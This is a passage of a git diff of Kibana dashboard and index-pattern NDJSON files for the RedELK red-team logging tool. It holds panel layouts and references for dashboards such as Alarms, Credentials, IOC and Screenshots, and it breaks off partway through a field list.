\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642152857910, 2093], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642152857910, 2101], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642152857910, 2109], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1642152857910, 2115], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642152857910, 2121], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642152857910, 2127], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642152857910, 2133], "type": "dashboard", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson index 1f43fbee..a4de64c5 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"s